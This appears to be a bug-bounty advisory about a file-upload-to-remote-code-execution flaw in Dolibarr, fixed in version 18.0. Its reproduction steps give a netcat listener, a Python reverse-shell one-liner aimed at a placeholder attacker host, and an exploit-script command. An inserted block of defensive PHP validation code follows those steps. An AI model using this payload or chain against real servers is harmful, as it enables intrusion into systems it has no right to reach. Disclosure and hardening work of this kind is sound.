Unrestricted File Upload leads to Remote Code Execution in dolibarr/dolibarr

Valid

Reported on: Feb 17th 2023


Description

Due to improper validation of the uploaded filename, an authenticated attacker can upload a file that has no extension. Combined with the "Export" feature, the attacker can then execute arbitrary commands on the target webserver.

Steps to Reproduce

On the attacker machine, start a listener on port 4444:

nc -lvnp 4444

Manual

1. Change the value of the "UMask parameter for new files on Unix/Linux/BSD/Mac file system" setting (/admin/security_file.php endpoint) to 0777.

2. Prepare a file named mysqldump (or any name listed in $dolibarr_main_restrict_os_commands, shown at the /admin/system/security.php endpoint) containing the reverse shell payload (or any other payload), for example:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ATTACKER-IP}",{ATTACKER-PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

3. Use the "Form to test file upload" on /admin/security_file.php to upload that file. The file is stored at {Data files directory}/admin/temp/{FILE_NAME}.

4. Open the "Export" feature (/admin/tools/dolibarr_export.php endpoint), set "Full path to mysqldump command" to {Data files directory}/admin/temp/{FILE_NAME}, and click "Generate Backup".

5. The attacker's terminal receives a connection back from the target webserver.
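The chain above relies on two missing checks: the upload form accepts a filename with no extension, and the export feature accepts any absolute path whose basename matches an allowed command, even one inside the writable data directory. The PHP below is an added defensive illustration, not Dolibarr's code and not the content of the fix commit; the function names are hypothetical, the command allow-list and extension allow-list are assumed values, and the planted file under a temporary directory is constructed for the demo.

```php
<?php
// Added example (not Dolibarr code). Function names are hypothetical.

/**
 * Reject an uploaded filename that has no extension, an extension outside the
 * allow-list, or any path separator / control character. Returns the accepted
 * basename, or null when the upload must be refused.
 */
function validate_upload_filename(string $name, array $allowedExt): ?string
{
    $base = basename($name);                          // strip any directory part
    if ($base === '' || $base === '.' || $base === '..') {
        return null;
    }
    if (preg_match('/[\x00-\x1f\/\\\\]/', $base)) {   // control chars or separators
        return null;
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if ($ext === '') {                                 // e.g. "mysqldump": no extension, refuse
        return null;
    }
    if (!in_array($ext, $allowedExt, true)) {          // only expected document types
        return null;
    }
    return $base;
}

/**
 * Accept a configured dump-command path only if it is absolute, resolves to an
 * existing executable regular file, its basename is on the command allow-list,
 * and it does not live anywhere under the web application's data directory
 * (where uploads land). Basename matching alone is what the report bypasses.
 */
function validate_os_command_path(string $path, array $allowedCommands, string $dataRoot): bool
{
    if ($path === '' || $path[0] !== '/') {
        return false;
    }
    $real = realpath($path);                           // collapse symlinks and ../
    if ($real === false || !is_file($real) || !is_executable($real)) {
        return false;
    }
    if (!in_array(basename($real), $allowedCommands, true)) {
        return false;
    }
    $dataReal = realpath($dataRoot);
    if ($dataReal !== false && strpos($real, rtrim($dataReal, '/') . '/') === 0) {
        return false;                                  // inside the writable data tree
    }
    return true;
}

// Constructed demo: a fake "mysqldump" planted under a temporary data directory,
// mirroring where the uploaded file ends up in the report.
$dataRoot = sys_get_temp_dir() . '/dolibarr_demo_data';
@mkdir($dataRoot . '/admin/temp', 0700, true);
$planted = $dataRoot . '/admin/temp/mysqldump';
file_put_contents($planted, "#!/bin/sh\n");
chmod($planted, 0700);

$allowedExt      = ['png', 'jpg', 'pdf'];                        // assumed allow-list
$allowedCommands = ['mysqldump', 'mysql', 'pg_dump', 'pg_restore']; // assumed allow-list

var_dump(validate_upload_filename('mysqldump', $allowedExt));    // NULL: no extension
var_dump(validate_upload_filename('report.pdf', $allowedExt));   // string "report.pdf"
var_dump(validate_os_command_path($planted, $allowedCommands, $dataRoot)); // false: under data root
```

The second check is the one that matters even if the upload check is later relaxed: a dump command path that resolves into the data directory is rejected regardless of its basename, so a planted file named after an allowed command is never executed.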

Automation Tool

Use the exploit code and execute the following command (this exploit uses mysqldump as the uploaded filename):

python3 exploit.py -t "{TARGET-WEBSERVER}" -u {USERNAME} -p {PASSWORD} -lhost {ATTACKER-LISTENING-IP} -lport {ATTACKER-LISTENING-PORT}

Proof of Concept

Impact

By exploiting this vulnerability, an authenticated attacker can execute arbitrary commands on the target server.

We are processing your report and will contact the dolibarr team within 24 hours. (a year ago)
blakduk modified the report (a year ago)
We have contacted a member of the dolibarr team and are waiting to hear back. (a year ago)
Laurent Destailleur validated this vulnerability. (a year ago)
blakduk has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
The researcher's credibility has increased: +7
Laurent Destailleur marked this as fixed in 18.0 with commit 27279a. (a year ago)
Laurent Destailleur has been awarded the fix bounty.
This vulnerability has now been published. (24 days ago)